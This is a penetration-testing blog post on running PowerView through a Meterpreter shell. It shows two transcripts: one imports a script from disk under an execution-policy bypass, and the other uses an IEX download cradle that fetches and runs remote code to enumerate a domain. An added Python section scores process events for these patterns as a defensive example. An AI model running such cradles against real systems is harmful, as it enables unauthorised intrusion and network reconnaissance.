http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html
More recent posts on the subject by harmj0y
http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/
Anyway, option #2 from The PowerShell Weaponization Problem works fine if you don't care about the script being on disk.
Gist with the command
meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
Via IEX download method: Gist with the command
C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
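From the defender's side, the two launches above leave a recognisable process-creation trail: powershell.exe started with `-exec bypass`, and either a `.ps1` imported from a user-writable path (the on-disk variant) or an IEX plus DownloadString cradle (the in-memory variant). The Python below is an added example and is not part of the original post or of PowerView; it scores Sysmon-style process-creation events (field names Image, CommandLine, ParentImage) against those indicators. The sample events, the tag names, the user-writable path list and the alert threshold are all assumptions constructed for the example.

```python
"""Score PowerShell process-creation events for the two launch patterns
shown in the transcripts above. Sample events are constructed, not real
telemetry; field names follow Sysmon event ID 1 conventions."""
import re
from dataclasses import dataclass, field

# Indicator patterns. Windows command lines are case-insensitive, and
# PowerShell accepts abbreviated parameter names, so match loosely.
EXEC_BYPASS = re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass", re.I)
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
INVOKE_EXPRESSION = re.compile(r"\biex\b|invoke-expression", re.I)
SCRIPT_ON_DISK = re.compile(r"import-module\s+['\"]?([^'\";]+\.ps1)", re.I)
# Assumed list of locations an unprivileged user can write to.
USER_WRITABLE = re.compile(r"^(?:c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\|%temp%)", re.I)
POWERSHELL_IMAGES = ("powershell.exe", "powershell_ise.exe", "pwsh.exe")


@dataclass
class Finding:
    image: str
    tags: list = field(default_factory=list)
    score: int = 0


def analyze(image: str, cmdline: str) -> Finding:
    """Tag one process-creation event; returns an empty Finding for non-PowerShell images."""
    finding = Finding(image=image)
    if not image.lower().endswith(POWERSHELL_IMAGES):
        return finding
    if EXEC_BYPASS.search(cmdline):
        finding.tags.append("execution_policy_bypass")
        finding.score += 1
    # A download primitive alone is common in admin scripts; piping it
    # straight into Invoke-Expression is the in-memory cradle pattern.
    if DOWNLOAD_CRADLE.search(cmdline) and INVOKE_EXPRESSION.search(cmdline):
        finding.tags.append("in_memory_download_cradle")
        finding.score += 3
    match = SCRIPT_ON_DISK.search(cmdline)
    if match:
        finding.tags.append("script_import_from_disk")
        finding.score += 1
        if USER_WRITABLE.match(match.group(1).strip()):
            finding.tags.append("script_in_user_writable_path")
            finding.score += 1
    return finding


# Constructed sample events: the two command lines from the post, one
# benign scheduled script, and one non-PowerShell process.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_IMAGE,
     "CommandLine": r'''powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"'''},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_IMAGE,
     "CommandLine": r'''powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"'''},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS_IMAGE,
     "CommandLine": r'powershell.exe -NoProfile -File "C:\Program Files\Scripts\backup.ps1"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\user\notes.txt"},
]


def triage(events, threshold: int = 2):
    """Return (ParentImage, Finding) for every event scoring at or above threshold."""
    hits = []
    for event in events:
        finding = analyze(event["Image"], event["CommandLine"])
        if finding.score >= threshold:
            hits.append((event["ParentImage"], finding))
    return hits


if __name__ == "__main__":
    for parent, finding in triage(SAMPLE_EVENTS):
        print(f"score={finding.score} parent={parent} tags={finding.tags}")
```

The scoring is deliberately additive rather than a single signature: `-exec bypass` on its own is noisy in many environments, but combined with a cradle or a script under a user profile it is worth a look, and the ParentImage field (cmd.exe spawned from the meterpreter `shell` command in the transcript) gives the analyst the process chain to pivot on.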
2 comments:
Executing Powershell through Meterpreter is a hot discussion topic at the moment. A few people are pondering options and I'm playing with a couple of ideas to make this a little nicer. It might be nice to have a command that sits alongside "shell" which is called "powershell" that just gives you an interactive PS prompt. This might have to be done via a new extension though, given that it'd probably require automation of PS rather than shelling out to it and mucking with std handles.
So watch this space!
yes plz :-)